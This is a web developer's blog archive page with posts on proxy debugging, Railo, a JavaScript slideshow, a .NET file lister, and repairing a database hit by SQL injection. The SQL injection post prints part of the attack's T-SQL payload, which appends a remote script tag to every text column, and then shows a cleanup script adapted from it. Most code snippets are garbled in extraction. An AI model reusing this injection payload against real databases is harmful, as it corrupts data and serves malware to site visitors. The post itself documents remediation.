Archive for the ‘web’ Category

Proxy your connections for debugging

Monday, February 23rd, 2009

One of the tricky things about having flash or ajax client applications that request data on their own is knowing what they are requesting and when. I went nuts today trying to figure out if my ajax was making the right calls and getting back data, 404 messages, or nothing at all. That was until i remembered Squid.

Squid is a simple proxy server used in the unix world for logging or filtering web content but it can be very handy as a desktop tool for debugging rich internet applications.


Looking around, I found this great installer and GUI front end for Squid for OSX called SquidMan.

When you first launch SquidMan it will prompt you to install the Squid subsystem, just click OK enter your password and it will bring up the settings:

You can leave all of the settings as the default

Then from the main dialog, click “Start Squid”

In firefox, find the network settings under the Advanced tab:

Enter your local computer 127.0.0.1 as the proxy host:

This will now force all of your Firefox traffic to go through the squid proxy. From the main SquidMan application settings, you can now choose “Tools” and see a log of every URL that is requested by javascript or flash within your browser:

The whole web is malware today

Saturday, January 31st, 2009

Is it just me, or is Google reporting all sites as Malware for everyone today?

screenshot of google

Railo joins Jboss. How did I miss this?

Thursday, November 20th, 2008

I spend most of my days lately doing enterprise-ish type stuff in Java. Way back in the day though, my first paying programming job was writing Cold Fusion during the first dot-com upsurge. Since then I have always had a bit of a soft spot for CFML. I still think it is one of the best languages for non-pro programmers to write pages in and for professionals to do quick mock-ups with. When compared to PHP I think it is generally a better framework for prototyping and simple applications.

The one thing that has always kept me, and I’m sure many others, from choosing CFM for anything was the fact that the license costs over $1000 and not many web-hosts support it.

I sort of always thought Macromedia would open source Cold Fusion and I’m somewhat surprised Adobe hasn’t made moves in this direction. Over the past few years several projects have made some front is building an open source alternative. The smith project looked like it was the best option until it seemed to fizzle out earlier this year. Now, after clicking around I noticed a press release that Railo has joined Jboss and will be open sourced!

This is huge news if you are a fan of CFM. Jboss has a lot of clout and resources to get things done. I expect that they will release something that is solid and eventually compete on par with the offerings from Adobe itself.

This combined with the progress people have made running other languages on the JVM – Groovy, Scala, Ruby, PHP, and Python – makes java application servers a clear choice for running all sorts of scripted sites on true application servers.

Now, will someone please open source a port of ASP classic so I can host all my legacy apps on linux? (Sun, I’m looking at you. who is paying for Sun Java System ASP anyway?).

Javascript Image Morph

Sunday, November 16th, 2008

I’ve been working on an image gallery and needed a way to do nice fade/morphs between a list of images for a slideshow. I used prototype and scriptalicious. Here is how I did it:

See the Demo Here

Download Entire Source of Example

Javascript to do the work:

//preload the images and load them into an array
'photo_01.jpg''photo_02.jpg''photo_03.jpg''photo_04.jpg''photo_05.jpg';
imageArray[imageArray.length] = image05;
 
// imageIndex is going to be the index of the next image to display.  
// images 0 and 1 are already loaded into the html
// place the next image to be displayed to the front
	$('imageFront'// make the image in front appear, when it is done swap it with the image in the back
'imageFront'// make the image in the back the same src as the image in the front
			$('imageBehind').src = $('imageFront').src;
			
			//hide the image in the front
			$('imageFront''none';
			
			// increment the index
// if we have indexed past the end of the array, go back to zero
 

Within the HTML, the only tricky thing here is that you need to position the two IMG tags so they are on top of each other. For my purpose absolute positioning was okay. It may take alittle more work for relative positioning.

<html>
<head>
	<script type="text/javascript" src="js/prototype.js""text/javascript" src="js/scriptaculous.js?load=effects""javascript">
             /* code from above goes here */"setInterval('switchImage()', 3000);">
	<img id="imageBehind" src="photo_01.jpg" style="position:absolute; top:0; left:0;" />
	<img id="imageFront" src="photo_02.jpg" style="position:absolute; top:0; left:0; display:none;" />
</body>
</html>

** update. thanks to Star for letting me know that the morph blinked in Firefox 2.0. I fixed the post and the example so it doesn’t do that anymore. **

Simple .NET script to list all of the .swf files in a folder as XML

Thursday, November 13th, 2008

Here is some handy code for if you have a bunch of .swf files and you need to get some XML to load them into flash. It should also totally be easy to change the script to list any file type you need enumerated.

span style="color: #cc0000;">"text/xml""System.Xml""System.IO""C#" runat="server""scenes""""*.swf""movie""name"

This will output something like:

<?xml version="1.0" encoding="utf-8"?>
<scenes>
    <movie name="scene_001.swf"/>
    <movie name="scene_002.swf"/>
    <movie name="scene_003.swf"/>
    <movie name="scene_004.swf"/>
    <movie name="scene_005.swf"/>
    <movie name="scene_006.swf"/>
</scenes>

Using SQL Injection attack code to repair database

Thursday, September 25th, 2008

Now that Google has started flagging sites that are linking to badware in their index I’ve been getting quite a few calls from people who have been flagged and need to get back on track.

These are often sites that were written a while back (not by myself) when developers didn’t think as much about SQL injection as they do now. Sometimes the code was just poorly written by someone who didn’t know better. However it happened, each site has its own challenge.

Fixing the security hole is generally straight forward — I usually just have to identify where the SQL isn’t properly escaped and fix that code. The hard part I have had fixing these sites is fixing the database itself. Some clients have backups, and some I can fix with SQL Log Rescue, but generally a lot of small clients simply don’t have great control over their server and often don’t have any backups.

I had one such of these clients this week where their database had hundreds and hundreds of tables, all with malware code injected into the data. I was initially going to write a script to clean all the data, but after looking at the malware attack, I was able to use their own code to fix the database.

In the server log files. I noticed this request was coming in for every script several times a day. Looks like it just wanders the internet hoping that that id=2 in the query string won’t be escaped in the code.

 

 

If the id isn’t escaped, as it wasn’t in this situation, a query like this will hit your SQL server:

 

 

hmm. okay. so what is it executing as the value of @S?
If you change the statement from EXEC(@S) to PRINT(@S) you get this:
Warning: Do not run this on your server, it will mess up ALL of your data

span style="color: #FF0000;">'u''update ['+@T+'] set ['+@C+']=''"></title><script src="http://www.wirelust.com/baddies-script.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www.wirelust.com/baddies-script.js"></script><!--'''

 

I thought this code was pretty clever. It selects a cursor that contains every varchar and text field in every table on the database, then loops over the cursor and issues an update command to append their bad script to the end of the data in each field.

Luckily, it is in their best interest to leave your data in place and just place their code at the end – it increases the chance you won’t know your site is infected.

Since all of the original data is still in the database, I was able to tweak their code a little bit to write a script to fix the data:

span style="color: #FF0000;">'u''update ['+@T+'] set ['+@C+']=Replace(['+@C+'], ''<script src="http://www.wirelust.com/baddies-script.js"></script>'', '''') where '+@C+' like ''%<script src="http://www.wirelust.com/baddies-script.js"></script>%'''-- exec(@SQL)
 

Google Maps You Have Failed Me

Thursday, December 7th, 2006

Today I had to meet at a clients office that I had never been to before. Given that I have 100% faith in technology, I mapped out the directions using a map I had created for the client as my starting point. When I got there I was in the totally incorrect place (a first for me when using google). I opened up Google maps on my phone and was able to get directions from the incorrect address to the correct one. I assumed at the time that the original map had the incorrect address typed in on it.

When I got back to the office I tried to fix the client’s site and found myself unable to. It turns out that the maps that google spits out for its embedded API are different than the maps that google’s site itself uses. I searched and searched and couldn’t find any reference of this anywhere on the web. I will search more after this post.

Here is the map that google’s site spits out for the address I am searching for:

Here is the map that google’s API returns for the same area:

It seems that google’s site and Google mobile are using map data from Navteq, while the API is using map data from TeleAtlas.

Interestingly though, the TeleAtlas data appears to be correct and more up to date, but the geocoding for the address is only correct on the Navteq map.

The geocode for the same address on the more up to date map is three miles off.

For good measure I checked out the Yahoo api, which says that it uses data from both TeleAtlas and/or Navteq. It appears to just be Navteq though:

Anyone know anything more about this?

Also, taking screen shots I realize just how 1337 I really am, or messy, ha.